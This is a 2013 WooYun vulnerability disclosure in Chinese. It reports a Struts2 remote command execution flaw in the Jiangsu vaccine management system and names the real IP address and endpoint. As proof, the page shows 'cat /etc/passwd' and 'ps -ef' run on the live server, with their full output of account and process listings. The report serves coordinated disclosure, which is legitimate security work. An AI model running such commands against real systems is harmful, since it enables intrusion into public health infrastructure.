当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036262

漏洞标题:江苏省疫苗管理信息系统远程执行命令漏洞

相关厂商:江苏省疾控中心

漏洞作者: hollies

提交时间:2013-09-06 12:18

修复时间:2013-10-21 12:19

公开时间:2013-10-21 12:19

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-06: 细节已通知厂商并且等待厂商处理中
2013-09-10: 厂商已经确认,细节仅向厂商公开
2013-09-20: 细节向核心白帽子及相关领域专家公开
2013-09-30: 细节向普通白帽子公开
2013-10-10: 细节向实习白帽子公开
2013-10-21: 细节向公众公开

简要描述:

江苏省疫苗管理信息系统apache struts2远程执行命令漏洞

详细说明:

江苏省疫苗管理信息系统
http://218.94.1.82/biology/rss.action
cat /etc/passwd
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:6:12::/var/adm/invscout:/usr/bin/ksh
snapp:*:200:13:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
ipsec:*:201:1::/etc/ipsec:/usr/bin/ksh
nuucp:*:7:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
pconsole:*:8:0::/var/adm/pconsole:/usr/bin/ksh
esaadmin:*:10:0::/var/esa:/usr/bin/ksh
oracle:!:204:202::/home/oracle:/usr/bin/ksh

漏洞证明:

ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 Dec 30 - 7:03 /etc/init
root 82002 135332 0 Dec 30 - 1539:52 dtgreet
root 86074 147614 0 Dec 30 - 54:31 /usr/lpp/X11/bin/X -cc 4 -D /usr/lib/X11//rgb -T -force :0 -auth /var/dt/A:0--xqjUa
root 98424 1 0 Dec 30 - 0:00 /usr/lib/errdemon
root 114824 1 0 Dec 30 - 0:00 /usr/ccs/bin/shlap64
root 127130 1 0 Dec 30 - 666:09 /usr/sbin/syncd 60
root 135332 147614 0 Dec 30 - 0:00 dtlogin <:0> -daemon
root 147614 1 0 Dec 30 - 0:06 /usr/dt/bin/dtlogin -daemon
root 184466 221248 0 Dec 30 - 0:00 /usr/sbin/rsct/bin/IBM.ServiceRMd
root 188624 1 0 Dec 30 - 1:11 /usr/bin/cimlistener
root 192672 1 0 Dec 30 - 0:57 /opt/ibm/director/cimom/bin/tier1slp
root 204988 221248 0 Dec 30 - 0:00 /opt/freeware/cimom/pegasus/bin/cimssys cimsys
root 221248 1 0 Dec 30 - 0:00 /usr/sbin/srcmstr
root 225464 1 0 Dec 30 - 0:00 /opt/freeware/cimom/pegasus/bin/CIM_diagd
root 229604 221248 0 Dec 30 - 0:00 /opt/freeware/cimom/pegasus/bin/cimssys platform_agent
root 233634 221248 0 Dec 30 - 3:46 /usr/sbin/aixmibd
daemon 245922 221248 0 Dec 30 - 0:00 /usr/sbin/rpc.statd -d 0 -t 50
root 250000 221248 0 Dec 30 - 3:31 /usr/sbin/syslogd
root 254088 221248 0 Dec 30 - 0:22 /usr/sbin/snmpmibd
root 262278 221248 0 Dec 30 - 0:00 /usr/sbin/snmpd
root 266258 221248 0 Dec 30 - 0:02 /usr/sbin/inetd
root 274486 1 0 Dec 30 - 4:39 bin/nonstop_aix @config/nonstop.properties
root 278664 1 0 Dec 30 - 6:15 ./slp_srvreg -D
root 286886 1 0 Dec 30 - 4:18 /opt/ibm/icc/cimom/bin/dirsnmpd
root 291056 1 0 Dec 30 - 8:28 [cimserve]
root 299176 221248 0 Dec 30 - 0:22 /usr/sbin/hostmibd
root 303256 221248 0 Dec 30 - 0:00 /usr/sbin/portmap
root 307364 221248 0 Dec 30 - 15:04 sendmail: accepting connections
root 311490 221248 0 Dec 30 - 0:00 /usr/sbin/rpc.lockd -d 0
root 315562 221248 0 Dec 30 - 0:00 /usr/sbin/biod 6
root 323754 221248 0 Dec 30 - 0:00 /usr/sbin/writesrv
root 340166 274486 0 May 29 - 438:04 /var/opt/tivoli/ep/_jvm/jre/bin/java -Xmx384m -Xminf0.01 -Xmaxf0.4 -Xbootclasspath/a:/var/opt/tivoli/ep/runtime/core/rcp/eclipse/plugins/com.ibm.rcp.base_6.1.2.200801281200/rcpbootcp.jar:/var/opt/tivoli/ep/lib/icl.jar:/var/opt/tivoli/ep/lib/jaas2zos.jar:/var/opt/tivoli/ep/lib/jaasmodule.jar:/var/opt/tivoli/ep/lib/lwinative.jar:/var/opt/tivoli/ep/lib/lwirolemap.jar:/var/opt/tivoli/ep/lib/passutils.jar:../../runtime/agent/lib/cas-bootcp.jar -Xverify:none -cp eclipse/launch.jar:eclipse/startup.jar:/var/opt/tivoli/ep/runtime/core/rcp/eclipse/plugins/com.ibm.rcp.base_6.1.2.200801281200/launcher.jar com.ibm.lwi.LaunchLWI
root 344262 1 0 Dec 30 - 0:00 /usr/sbin/uprintfd
root 348362 1 0 Dec 30 - 5:12 /usr/sbin/cron
root 356528 221248 0 Dec 30 - 0:07 /usr/sbin/qdaemon
root 360656 221248 0 Dec 30 - 4:41 /usr/sbin/rsct/bin/vac8/IBM.CSMAgentRMd
root 372928 221248 0 Dec 30 - 1:00 /usr/sbin/rsct/bin/rmcd -a IBM.LPCommands -r
root 385216 1 0 Dec 30 lft0 0:00 /usr/sbin/getty /dev/console
root 389316 1 0 Dec 30 - 0:00 /usr/lpp/diagnostics/bin/diagd
pconsole 393434 737498 0 Jul 04 - 6:33 /usr/java5/bin/java -Xmx512m -Xms20m -Xscmx10m -Xshareclasses -Dfile.encoding=UTF-8 -Xbootclasspath/a:/pconsole/lwi/runtime/core/rcp/eclipse/plugins/com.ibm.rcp.base_6.1.2.200801281200/rcpbootcp.jar:/pconsole/lwi/lib/ISCJaasModule.jar:/pconsole/lwi/lib/icl.jar:/pconsole/lwi/lib/jaas2zos.jar:/pconsole/l

修复方案:

升级到最新版本Struts2.3.15.1及以上

版权声明:转载请注明来源 hollies@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2013-09-10 23:43

厂商回复:

最新状态:

暂无